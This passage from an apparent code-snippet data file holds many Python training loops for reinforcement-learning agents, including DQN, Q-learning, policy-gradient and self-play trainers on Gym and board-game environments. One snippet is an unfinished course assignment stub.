reward, next_state, 
done) # records experience and learns (depending on settings)\n state = next_state\n score += reward\n if done:\n last_t = t + 1\n break\n scores_window.append(score) # save most recent score\n scores.append(score) # save most recent score\n eps = max(eps_end, eps_decay * eps) # decrease epsilon\n print('\\rEpisode {}\\tNum steps: {}\\tAverage Score: {:.2f}'.format(i_episode, last_t, np.mean(scores_window)))\n # if i_episode % 100 == 0:\n # print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))\n if np.mean(scores_window) >= 13: # win condition in course\n if num_saves == 0:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode - 100, np.mean(scores_window)))\n print('\\nTraining will continue and the checkpoint will be overwritten every 100 episodes')\n print('\\nSaving a checkpoint now, you may interrupt code execution with eg Ctrl+C')\n torch.save(agent.qnetwork_local.state_dict(), strCheckpointFile)\n else:\n if i_episode % 100 == 0:\n print('\\nSaving another checkpoint now, you may interrupt code execution with eg Ctrl+C')\n torch.save(agent.qnetwork_local.state_dict(), strCheckpointFile)\n num_saves += 1\n\n env.close()\n\n # plot the scores\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(np.arange(len(scores)), scores)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n # plt.show()\n plt.savefig('training_score_by_episode.png')\n return scores", "def learn(self, num_episodes=10000):\n for i in range(num_episodes):\n self.actor()\n self.learner()", "def train_model(num_episodes, model_version, discount_rate, learning_rate):\n\n # getting available models\n with open('model_architectures.yaml', 'r') as file:\n available_models = yaml.safe_load(stream = file)\n file.close()\n\n # input checks\n if type(num_episodes) != int:\n raise TypeError('num_episodes must be of type int')\n if num_episodes <= 0:\n raise ValueError('num_episodes must be greater than zero')\n if type(model_version) != str:\n raise TypeError('model_version must be of type string')\n if model_version not in available_models:\n raise ValueError('model_version not available')\n if type(discount_rate) != int and type(discount_rate) != float:\n raise TypeError('discount rate must be of type int or float')\n if discount_rate <= 0:\n raise ValueError('discount_rate must be greater than zero')\n if type(learning_rate) != float:\n raise TypeError('learning_rate must be of type float')\n if learning_rate <= 0 or learning_rate >= 1:\n raise ValueError('learning_rate must be within (0, 1)')\n\n # determining model sub-version\n model_sub_version_write = False\n sub_version = 0\n while not model_sub_version_write:\n if not os.path.exists(os.path.join('trained_models', model_version, model_version + '.' 
+ str(sub_version) + '.0')):\n model_sub_version_write = True\n break\n sub_version += 1\n\n # building model\n model = eval(available_models[model_version])()\n optimizer = tf.keras.optimizers.Adam(learning_rate = learning_rate)\n compute_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits = True)\n\n # holding gradients\n gradient_holder = model.trainable_variables\n for i, gradient in enumerate(gradient_holder):\n gradient_holder[i] = gradient * 0\n\n # creating gym environment\n env = gym.make('CartPole-v1')\n env._max_episode_steps = 15000\n\n scores = []\n every_update = 5\n\n # training loop\n for episode in range(num_episodes + 1):\n observation = env.reset()\n\n episode_memory = []\n episode_score = 0\n done = False\n\n while not done:\n\n # creates vector of form [Position, Velocity, Angle, Angular Velocity]\n observation = observation.reshape([1, 4])\n\n with tf.GradientTape() as tape:\n\n # creating loss function and action\n logits = model(observation)\n a_dist = logits.numpy()\n action = np.random.choice(a = a_dist[0], p = a_dist[0])\n action = np.argmax(a_dist == action)\n loss = compute_loss([action], logits)\n\n # performing action and getting feedback from environment\n observation, reward, done, info = env.step(action)\n\n episode_score += reward\n\n # trick for quicker convergence\n if done:\n reward -= 10\n\n # getting gradients\n gradients = tape.gradient(target = loss, sources = model.trainable_variables)\n episode_memory.append([gradients, reward])\n\n scores.append(episode_score)\n\n # discounting rewards\n episode_memory = np.array(episode_memory)\n episode_memory[:, 1] = discount_rewards(rewards = episode_memory[:, 1], discount_rate = discount_rate)\n\n # applying rewards to corresponding gradients\n for grads, reward in episode_memory:\n for i, grad in enumerate(grads):\n gradient_holder[i] += grad * reward\n\n # back-propagating gradients, resetting gradients\n if episode % every_update == 0:\n optimizer.apply_gradients(zip(gradient_holder, model.trainable_variables))\n for i, grad in enumerate(gradient_holder):\n gradient_holder[i] = grad * 0\n\n if episode % 100 == 0:\n print('Episode {} Score {}'.format(episode, np.mean(scores[-20:])))\n tf.keras.models.save_model(model = model,\n filepath = os.path.join('trained_models', model_version, model_version + '.' +\n str(sub_version) + '.{}'.format(episode)))\n\n final_performance = int(round(np.mean(scores[-20:])))\n\n # dumping training results into yaml file\n yaml_dump = {}\n yaml_dump['Model Version'] = model_version\n yaml_dump['Model Sub-version'] = sub_version\n yaml_dump['Number of Training Episodes'] = num_episodes\n yaml_dump['Discount Rate'] = discount_rate\n yaml_dump['Learning Rate'] = learning_rate\n yaml_dump['Final Performance'] = final_performance\n\n with open(os.path.join('trained_models', model_version, model_version + '.' 
+ str(sub_version) + '_training_details.yaml'), 'w') as file:\n yaml.dump(data = yaml_dump, stream = file)\n file.close()", "def train(self, num_episodes=10000):\n\n self.game.restart()\n\n self.exp_states = defaultdict(int)\n\n for i in tqdm(range(num_episodes)):\n\n self.game.deal_cards()\n\n possible_actions = self.game.get_actions()\n\n player_state = self.game.get_player_state()\n player_action = self.player.get_action(player_state,\n possible_actions,\n explore_exploit='explore')\n\n # Bookkeep visited states (?)\n player_state_str = np.array2string(player_state)\n self.exp_states[player_state_str] += 1\n\n opponent_state = self.game.get_opponent_state()\n opponent_action = self.opponent.get_action(opponent_state,\n possible_actions)\n\n self.game.set_player_action(player_action)\\\n .set_opponent_action(opponent_action)\n\n player_score, opponent_score = self.game.get_scores()\n\n reward = self._get_reward(player_score, opponent_score)\n self.player.learn(player_state,\n player_action,\n reward)\n self.player.learn(opponent_state,\n opponent_action,\n -reward)\n \n print(\"Training done!\")", "def train(self, env):\n\n\t\tmin_average_reward_for_stopping = 195\n\t\tconsecutive_successful_episodes_to_stop = 10\n\t\tlast_10_rewards = deque(maxlen=consecutive_successful_episodes_to_stop)\n\n\t\tnum_Episodes = []\n\t\tEpisode_Rewards = []\n\n\t\tfor episode in range(self.episodes):\n\t\t\tstate = env.reset()\n\t\t\tstate = np.reshape(state, [1, self.state_size])\n\t\t\tdone = False\n\t\t\ttotal_reward = 0\n\n\t\t\twhile not done:\n\t\t\t\taction = self.act(state)\n\t\t\t\tnext_state, reward, done, _ = env.step(action)\n\t\t\t\tnext_state = np.reshape(next_state, [1, self.state_size])\n\t\t\t\tself.remember(state, action, reward, next_state, done)\n\t\t\t\tstate = next_state\n\t\t\t\ttotal_reward += reward\n\n\t\t\tnum_Episodes.append(episode)\n\t\t\tEpisode_Rewards.append(total_reward)\n\t\t\tlast_10_rewards.append(total_reward)\n\t\t\tlast_10_avg_reward = np.mean(last_10_rewards)\n\t\t\tprint(episode, last_10_avg_reward)\n\n\t\t\t# call experience relay\n\t\t\tif len(self.memory) >= self.batch_size:\n\t\t\t\tself.replay(self.batch_size)\n\t\t\t# Stopping criteria\n\t\t\tif len(\n\t\t\t\t\tlast_10_rewards) == consecutive_successful_episodes_to_stop \\\n\t\t\t\t\tand last_10_avg_reward > min_average_reward_for_stopping:\n\t\t\t\tprint(\"Solved after {} epsiodes\".format(episode))\n\t\t\t\tbreak", "def train(self, episodes, epsilon_initial, epsilon_min, epsilon_stop_episode,\n network_update_freq, gamma, memory_capacity, batch_size):\n\n memory = ReplayMemory(memory_capacity)\n\n tot_steps = 0\n running_loss = 0\n\n depsilon = (epsilon_initial-epsilon_min)/epsilon_stop_episode\n\n for episode in range(episodes):\n\n if epsilon_initial > epsilon_min:\n epsilon_initial -= depsilon\n\n if episode % network_update_freq == 0:\n # Update target network\n self.NN_target.load_state_dict(self.NN.state_dict())\n\n if (episode + 1) % 10 == 0:\n print(f'Episode {episode + 1}/{episodes} completed!')\n print(f'Average steps per episode: {tot_steps / 10}')\n writer.add_scalar('training loss', running_loss / tot_steps, episode)\n self.plotValue()\n tot_steps = 0\n running_loss = 0\n\n state, done = self.env.reset()\n\n\n while not done:\n tot_steps += 1\n\n action = self.chooseAction(epsilon_initial, state)\n\n reward, next_state, done= self.env.transitionState(state, action)\n\n #score += reward\n reward = torch.tensor([[reward]], device=device)\n done = torch.tensor([[done]], device=device)\n\n # Saves 
the transition\n memory.push(self.RBF[state], self.RBF[next_state], reward, done)\n\n # Perform one step of batch gradient descent\n running_loss += self.optimizeModel(memory, batch_size, gamma)\n\n state = next_state\n\n writer.close()", "def train_prediction(self, episodes=100, batch_size=32, steps=100):\n hidden_state = None\n for episode in range(episodes):\n state_data = self.env.dataset(batch_size=batch_size)\n state = self.state_to_observation(state_data)\n\n prediction = self.model(state, hidden_state)\n loss = F.mse_loss(prediction['value'], state_data['reward'])\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()", "def train_network(self, batch, episode_nr):\n global eps, eps_min, eps_decay\n for exp in batch:\n S = exp[0]\n S = process_state(S)\n action_number = exp[1]\n r = exp[2]\n S_new = exp[3]\n S_new = process_state(S_new)\n terminal = exp[4]\n\n if not terminal: # If agent is not at its final destination\n target = (r + gamma*np.amax(self.target.predict(S_new)[0]))\n else:\n target = r\n target_f = self.policy.predict(S)\n\n target_f[0][action_number] = target # Update something???\n self.policy.fit(S, target_f, epochs=1, verbose=0) # Train network # Verbose - makes training line?\n if self.epsilon > self.eps_min and episode_nr > 10:\n self.epsilon *= self.eps_decay # Decrease exploration rate", "def train(self, num_tickers=4, episodes_per_ticker=5, **kwargs):\n num_tickers = min(num_tickers, len(self.filtered_tickers))\n for i in range(num_tickers):\n ticker = self.filtered_tickers[i % num_tickers]\n env = self.ENV_CONSTRUCTOR(ticker=ticker, **kwargs)\n for j in tqdm(range(episodes_per_ticker)):\n history = self.run_episode(env)\n history[\"ticker\"] = ticker\n history[\"episode\"] = j + 1\n history[\"t\"] = range(len(history))\n self.history = pd.concat((self.history, history))\n self.history = self.history.reset_index(\"Date\", drop=True)", "def train(self, num_decisions=350):\n os.system(\"mkdir \" + self.folder_name + \"Train\")\n for i in range(5000):\n episode_folder_name = self.folder_name + \"Train/\" + str(i) + \"/\"\n all_system_states = []\n all_system_rewards = []\n all_system_states_cluster = []\n all_grid_states_cluster = []\n all_surrounding_states_cluster = []\n os.system(\"mkdir \" + episode_folder_name)\n filename = episode_folder_name + str(i) + \".h5\"\n self.system.reset_context(filename)\n self.system.run_decorrelation(20)\n grid_dist, surrounding_dist, _, _, _, _ = self.system.get_state_reward()\n state = self._get_state(grid_dist, surrounding_dist)\n for j in range(num_decisions):\n action_index = self._get_action(state, i)\n transition_to_add = [state, action_index]\n tag = \"_train_\" + str(j)\n actions = [self.all_actions[i] for i in action_index]\n try:\n self.system.update_action(actions)\n system_states, system_rewards, system_states_cluster = self.system.run_step(\n is_detailed=True, tag=tag)\n all_system_states.append(system_states)\n all_system_rewards.append(system_rewards)\n all_system_states_cluster.append(system_states_cluster)\n\n except OpenMMException:\n print(\"Broken Simulation at Episode:\",\n str(i), \", Decision:\", str(j))\n break\n\n grid_dist, surrounding_dist, grid_reward, surrounding_reward, grid_states_cluster, surrounding_states_cluster = self.system.get_state_reward()\n state = self._get_state(grid_dist, surrounding_dist)\n reward = self._get_reward(grid_reward, surrounding_reward)\n\n all_grid_states_cluster.append(grid_states_cluster)\n 
all_surrounding_states_cluster.append(surrounding_states_cluster)\n\n # Use len_reward for number of grids\n done = [False] * len(reward) # Never Done\n transition_to_add.extend([reward, state, done])\n rb_decision_samples = 0\n for rb_tuple in zip(*transition_to_add):\n self.buffer.push(*list(rb_tuple))\n\n for _ in range(self.update_num):\n self._update()\n self._save_episode_data(episode_folder_name)\n np.save(episode_folder_name + \"system_states\",\n np.array(all_system_states))\n np.save(episode_folder_name + \"system_rewards\",\n np.array(all_system_rewards))\n np.save(episode_folder_name + \"system_states_cluster\",\n np.array(all_system_states_cluster))\n np.save(episode_folder_name + \"grid_states_cluster\",\n np.array(all_grid_states_cluster, dtype=object))\n np.save(episode_folder_name + \"all_states_cluster\",\n np.array(all_surrounding_states_cluster))\n self._save_data()", "def trainOneEpisode(self, num_episodes, max_episode_steps=100, save_freq=100, render=False):\n # tqdm.write('------Episode {} / {}------'.format(self.episodes_done, num_episodes))\n self.resetEnv()\n r_total = 0\n with trange(1, max_episode_steps+1, leave=False) as t:\n\n for step in t:\n if render:\n self.env.render()\n state = self.state\n action, q = self.selectAction(state, require_q=True)\n obs_, r, done, info = self.takeAction(action.item())\n # if print_step:\n # print 'step {}, action: {}, q: {}, reward: {} done: {}' \\\n # .format(step, action.item(), q, r, done)\n r_total += r\n # t.set_postfix(step='{:>5}'.format(step), q='{:>5}'.format(round(q, 4)), total_reward='{:>5}'.format(r_total))\n t.set_postfix_str('step={:>5}, q={:>5}, total_reward={:>5}'.format(step, round(q, 2), r_total))\n if done or step == max_episode_steps:\n next_state = None\n else:\n next_state = self.getNextState(obs_)\n reward = torch.tensor([r], device=self.device, dtype=torch.float)\n self.memory.push(state, action, next_state, reward)\n self.optimizeModel()\n if self.steps_done % self.target_update == 0:\n self.target_net.load_state_dict(self.policy_net.state_dict())\n\n if done or step == max_episode_steps - 1:\n tqdm.write('------Episode {} ended, total reward: {}, step: {}------' \\\n .format(self.episodes_done, r_total, step))\n tqdm.write('------Total steps done: {}, current e: {} ------' \\\n .format(self.steps_done, self.exploration.value(self.steps_done)))\n # print '------Episode {} ended, total reward: {}, step: {}------' \\\n # .format(self.episodes_done, r_total, step)\n # print '------Total steps done: {}, current e: {} ------' \\\n # .format(self.steps_done, self.exploration.value(self.steps_done))\n self.episodes_done += 1\n self.episode_rewards.append(r_total)\n self.episode_lengths.append(step)\n if self.episodes_done % save_freq == 0:\n self.saveCheckpoint()\n break\n self.state = next_state", "def train(self, episodes=2000, max_steps=99):\n\n for episode in range(episodes):\n state = self.env.reset()\n\n for step in range(max_steps):\n explore_eploit_tradeoff = np.random.uniform()\n\n if explore_eploit_tradeoff > self.epsilon:\n action = np.argmax(self.q_table[state, :])\n else:\n action = self.env.action_space.sample()\n\n new_state, reward, done, info = self.env.step(action)\n\n self.q_table[state, action] = self.q_table[state, action] \\\n + self.lr * (reward + self.gamma * np.amax(\n self.q_table[new_state, :]\n ) - self.q_table[state, action]\n )\n\n state = new_state\n if done:\n break\n exp_ = np.exp(-self.decay_rate * episode)\n self.epsilon = self.min_eps + exp_ * (self.max_eps - 
self.min_eps)", "def on_train_begin(self, logs):\n print(f\"Testing for {self.params['nb_episodes']} episodes ...\")", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.opt.num_epochs):\n self.run_epoch()\n if (self.epoch + 1) % self.opt.save_frequency == 0:\n self.save_model()", "def train(\r\n self,\r\n max_episodes : int,\r\n exploration_rate=0.9,\r\n discount=0.9,\r\n batch_size=32,\r\n timesteps_per_episode=200,\r\n warm_start=False,\r\n model_alignment_period=100,\r\n save_animation_period=100,\r\n save_model_period=10,\r\n evaluate_model_period=50,\r\n evaluation_size=10,\r\n exploration_rate_decay=0.99,\r\n min_exploration_rate=0.1,\r\n epochs=1,\r\n log_q_values=False) -> Controller:\r\n\r\n # Log training parameters\r\n params = {\r\n \"max_episodes\": max_episodes,\r\n \"exploration_rate\": exploration_rate,\r\n \"discount\": discount,\r\n \"batch_size\": batch_size,\r\n \"timesteps_per_episode\": timesteps_per_episode,\r\n \"model_alignment_period\": model_alignment_period,\r\n \"evaluate_model_period\": evaluate_model_period,\r\n \"evaluation_size\": evaluation_size,\r\n \"exploration_rate_decay\": exploration_rate_decay,\r\n \"min_exploration_rate\": min_exploration_rate,\r\n \"epochs\": epochs\r\n }\r\n self.params.update(params)\r\n self.Logger.log_params(self.params)\r\n\r\n # Load existing model for warm start\r\n if warm_start:\r\n check = self._load_model()\r\n if not check:\r\n print(\"Using default network\") # TODO: temp solution\r\n\r\n max_reward = -100\r\n for episode in range(1, max_episodes + 1):\r\n t1 = time.time()\r\n total_reward = 0\r\n eval_score = 0\r\n terminated = False\r\n steps = 0\r\n state = self.environment.reset(random=True) # start from random state\r\n\r\n # TODO: Check if possible to avoid reshape!!\r\n state = state[self.idx].reshape(1, self.state_size)\r\n\r\n for timestep in range(timesteps_per_episode):\r\n # Predict which action will yield the highest reward.\r\n action = self._act(state, exploration_rate,log_q_values)\r\n\r\n # Take the system forward one step in time.\r\n next_state = self.environment.step(action)\r\n\r\n # Compute the actual reward for the new state the system is in.\r\n current_time = timestep * self.environment.step_size\r\n reward = self.environment.reward(next_state, current_time)\r\n\r\n # Check whether the system has entered a terminal case.\r\n terminated = self.environment.terminated(next_state, current_time)\r\n\r\n # TODO: Can this be avoided?\r\n next_state = next_state[self.idx].reshape(1, self.state_size)\r\n\r\n # Store results for current step.\r\n self._store(state, action, reward, next_state, terminated)\r\n\r\n # Update statistics.\r\n total_reward += reward\r\n state = next_state\r\n steps = timestep+1\r\n\r\n if len(self.experience) >= batch_size:\r\n self._experience_replay(batch_size, discount, epochs)\r\n #exploration_rate *= exploration_rate_decay\r\n\r\n # Terminate episode if the system has reached a termination state.\r\n if terminated:\r\n break\r\n\r\n # Log the average loss for this episode\r\n\r\n self.Logger.log_loss(np.mean(self.episode_loss), episode)\r\n self.episode_loss = []\r\n\r\n # Log the average Q-values for this episode\r\n if log_q_values:\r\n self.Logger.log_q_values(self.episode_q_values/steps, episode)\r\n self.episode_q_values = np.zeros(len(self.environment.action_space))\r\n\r\n if exploration_rate > min_exploration_rate:\r\n exploration_rate *= exploration_rate_decay\r\n else:\r\n exploration_rate = 
min_exploration_rate\r\n t2 = time.time()\r\n print(\r\n f\"Episode: {episode:>5}, \"\r\n f\"Score: {total_reward:>10.1f}, \"\r\n f\"Steps: {steps:>4}, \"\r\n f\"Simulation Time: {(steps * self.environment.step_size):>6.2f} Seconds, \"\r\n f\"Computation Time: {(t2-t1):>6.2f} Seconds, \"\r\n f\"Exploration Rate: {exploration_rate:>0.3f}\")\r\n\r\n if episode % model_alignment_period == 0:\r\n self._align_target_model()\r\n\r\n # if episode % save_animation_period == 0:\r\n # self.environment.save(episode)\r\n\r\n\r\n if episode % evaluate_model_period == 0:\r\n eval_score = self._evaluate(evaluation_size, max_steps=timesteps_per_episode,episode=episode)\r\n\r\n if eval_score > max_reward:\r\n self._save_model(\"best\")\r\n max_reward = eval_score\r\n\r\n self._save_model(\"latest\")\r\n\r\n # Create Controller object\r\n controller = Controller(self.environment.get_action_space(), self.q_network, self.idx)\r\n print(\"Controller Created\")\r\n return controller", "def train(self, n_episodes):\n for episode in trange(n_episodes):\n policy_loss, entropy, episode_reward = self.train_step()\n self.writer.add_scalar('policy_loss', policy_loss, episode)\n self.writer.add_scalar('entropy', entropy, episode)\n self.writer.add_scalar('episode_reward', episode_reward, episode)", "def train(self, max_episodes= 1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):\n success = False\n i_episode = 0\n eps = eps_start\n \n print('Training in progress...')\n for i in range(max_episodes):\n score = self.run_training_episode(eps=eps)\n \n self.score_window.append(score)\n self.score_record.append(np.mean(self.score_window))\n \n i_episode += 1\n eps = max(eps_end, eps_decay*eps) # decrease epsilon\n\n if i_episode%100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n \n if i_episode>100:\n if np.mean(self.score_window)>self.criteria:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n success = True\n break\n\n if success:\n print('Criteria reached after {} episodes'.format(i_episode))\n else:\n print('Failed to reach Criteria after {} episodes'.format(i_episode))\n\n self.plot_training_progress()\n return success", "def train(self, batch_size=64, n_episodes=100, max_episode_length=3000, save_path=\"last_save.h5\",\n load_path=None):\n\n self.explore = True # Explore if needed\n\n self._play_through(n_episodes=n_episodes, max_episode_length=max_episode_length, save_path=save_path,\n callbacks=self._train_callbacks_factory())", "def train(self, num_batches: int):", "def train(self, num_episodes = 10000, verbose = True):\n start_time = datetime.now().replace(microsecond=0)\n for e in range(num_episodes):\n S_old = self.env.reset()\n steps = 0\n # there is an interal limit of 100 steps\n while steps < 1000:\n steps += 1\n A = self.epsilon_greedy(S_old)\n S_new, reward, done, info = self.env.step(A)\n self.Q[S_old, A] = self.Q[S_old, A] + self.alpha * \\\n (reward + self.gamma * np.max(self.Q[S_new, :]) - self.Q[S_old, A])\n if done:\n break\n S_old = S_new\n if verbose:\n clear_output(wait=True)\n now_time = datetime.now().replace(microsecond=0)\n print(\"Epoch: {}/{} - Steps: {:4} - Duration: {}\".format(e+1, num_episodes, steps, now_time-start_time))\n\n return self.Q", "def train_episode(self):\n state = self.env.reset()\n states = []\n actions = []\n rewards = []\n for _ in range(self.options.steps):\n probs = self.actor_baseline.predict([[state]])[0][0]\n action = np.random.choice(len(probs), p=probs)\n\n next_state, 
reward, done, _ = self.step(action)\n states.append(state)\n actions.append(action)\n rewards.append(reward)\n\n state = next_state\n\n if done:\n break\n\n # Compute and store returns in G\n G = np.zeros_like(rewards)\n ################################\n # YOUR IMPLEMENTATION HERE #\n ################################\n\n # One-hot encoding for actions\n actions_one_hot = np.zeros([len(actions), self.env.action_space.n])\n actions_one_hot[np.arange(len(actions)), actions] = 1\n\n # Compute one-hot encoded deltas\n ################################\n # YOUR IMPLEMENTATION HERE #\n ################################\n deltas = [[0]]\n\n # Update actor and state estimator\n self.actor_baseline.fit(x=[np.array(states)],\n y={'actor_output': deltas, 'baseline_output': returns},\n epochs=1, batch_size=self.options.batch_size, verbose=0)", "def train(Game, agent, episodes=1000):\n a = agent\n # eps_start = a.epsilon\n # eps_end = a.epsilon_min\n # eps_dec = np.exp(1/episodes * np.log(eps_end/eps_start))\n # a.epsilon_decrement = eps_dec\n times_taken = np.zeros(episodes)\n print(\"Training starting\")\n for n in range(episodes):\n start_time = time.time()\n g = Game()\n print(\"EPISODE\", n+1)\n while not g.success:\n state = 1.0*g.get_state()\n action = a.action(state)\n reward = g.play(action)\n # print(g.success)\n # print(\"reward: \", reward)\n # print(state)\n # print(action)\n # print(g.get_state())\n a.train(state, action, reward, g.get_state(), g.success)\n end_time = time.time()\n times_taken[n] = end_time - start_time\n print(\"Training complete ({} episodes)\".format(episodes))\n return times_taken", "def train_epoch(self):\n\n if self._train_data_set is not None and self._train_data_set is not None:\n self._model.fit_num_epochs(self._train_data_set, self._test_data_set)\n else:\n raise RuntimeError(\"[Triggerbot]: No training or test set available\")", "def learn(self):\n epochswin = [] # count the number of wins at every epoch of the network against the preceding version\n epochdraw = [] # count the number of draws at every epoch of the network against the preceding version\n epochswingreedy = [] # count the number of wins against greedy at every epoch\n epochswinrandom = [] # count the number of wins against random at every epoch\n epochsdrawgreedy = [] # count the number of draws against greedy at every epoch\n epochsdrawrandom = [] # count the number of wins against random at every epoch\n epochswinminmax = [] # count the number of wins against minmax at every epoch\n epochsdrawminmax = [] # count the number of draws against minmax at every epoch\n\n\n if self.args.load_model == True:\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \".txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswin.append(word)\n elif index == 1:\n epochdraw.append(word)\n file.close()\n\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \":greedyrandom.txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswingreedy.append(word)\n elif index == 1:\n epochsdrawgreedy.append(word)\n elif index == 2:\n epochswinrandom.append(word)\n elif index == 3:\n epochsdrawrandom.append(word)\n elif index == 4:\n 
epochswinminmax.append(word)\n elif index == 5:\n epochsdrawminmax.append(word)\n file.close()\n self.loadTrainExamples()\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n print('------ITER ' + str(i) + '------')\n # examples of the iteration\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n eps_time = AverageMeter()\n bar = Bar('Self Play', max=self.args.numEps)\n end = time.time()\n\n for eps in range(self.args.numEps):\n iterationTrainExamples += self.executeEpisode()\n\n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=eps + 1,\n maxeps=self.args.numEps,\n et=eps_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td)\n bar.next()\n bar.finish()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(self.trainExamplesHistory),\n \" => remove the oldest trainExamples\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1)\n self.saveTrainExamples(i - 1)\n\n # shuffle examlpes before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n exists = os.path.isfile(filenameBest)\n if exists:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n print('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game,nmcts,pmcts,evaluate=True)\n\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare, False)\n\n pmcts.clear()\n nmcts.clear()\n del pmcts\n del nmcts\n\n print(' ')\n print('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if i == 1:\n epochswin.append(pwins)\n epochdraw.append(0)\n\n epochswin.append(nwins)\n epochdraw.append(draws)\n self.writeLogsToFile(epochswin, epochdraw)\n\n ''' Get all the players and then pit them against the network. 
You need to modify here if you implement \n more players\n '''\n (gp, rp, mp) = self.decidePlayers()\n\n if self.args.parallel == 0:\n\n\n nmcts1 = MCTS(self.game, self.nnet, self.args)\n nmcts2 = MCTS(self.game, self.nnet, self.args)\n nmcts3 = MCTS(self.game, self.nnet, self.args)\n\n arenagreedy = Arena(lambda x: np.argmax(nmcts1.getActionProb(x, temp=0)), gp, self.game,nmcts1)\n arenarandom = Arena(lambda x: np.argmax(nmcts2.getActionProb(x, temp=0)), rp, self.game,nmcts2)\n arenaminmax = Arena(lambda x: np.argmax(nmcts3.getActionProb(x, temp=0)), mp, self.game,nmcts3,evaluate=True)\n\n pwinsminmax, nwinsminmax, drawsminmax = arenaminmax.playGames(self.args.arenaCompare)\n print(\"minmax - \"+str(pwinsminmax)+\" \"+str(nwinsminmax)+\" \"+str(drawsminmax))\n pwinsgreedy, nwinsgreedy, drawsgreedy = arenagreedy.playGames(self.args.arenaCompare)\n print(\"greedy - \"+str(pwinsgreedy)+\" \"+str(nwinsgreedy)+\" \"+str(drawsgreedy))\n pwinsreandom, nwinsrandom, drawsrandom = arenarandom.playGames(self.args.arenaCompare)\n print(\"random - \"+str(pwinsreandom)+\" \"+str(nwinsrandom)+\" \"+str(drawsrandom))\n\n nmcts1.clear()\n nmcts2.clear()\n nmcts3.clear()\n del nmcts1\n del nmcts2\n del nmcts3\n\n else:\n '''\n This will be used if you want to evaluate the network against the benchmarks in a parallel way\n '''\n\n self.args.update({'index': str(i)})\n\n p = self.parallel(self.args.arenaCompare)\n (pwinsminmax, nwinsminmax, drawsminmax) = p[0] # self.parallel(\"minmax\", self.args.arenaCompare)\n (pwinsgreedy, nwinsgreedy, drawsgreedy) = p[1] # self.parallel(\"greedy\",self.args.arenaCompare)\n (pwinsreandom, nwinsrandom, drawsrandom) = p[2] # self.parallel(\"random\",self.args.arenaCompare)\n\n epochsdrawgreedy.append(drawsgreedy)\n epochsdrawrandom.append(drawsrandom)\n epochswinrandom.append(pwinsreandom)\n epochswingreedy.append(pwinsgreedy)\n epochswinminmax.append(pwinsminmax)\n epochsdrawminmax.append(drawsminmax)\n\n self.writeLogsToFile(epochswingreedy, epochsdrawgreedy, epochswinrandom, epochsdrawrandom, epochswinminmax,\n epochsdrawminmax, training=False)\n\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) <= self.args.updateThreshold:\n print('REJECTING NEW MODEL')\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n exists = os.path.isfile(filenameBest)\n if exists:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n\n else:\n print('ACCEPTING NEW MODEL')\n\n filename = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n self.mcts.clear()\n del self.mcts\n self.mcts = 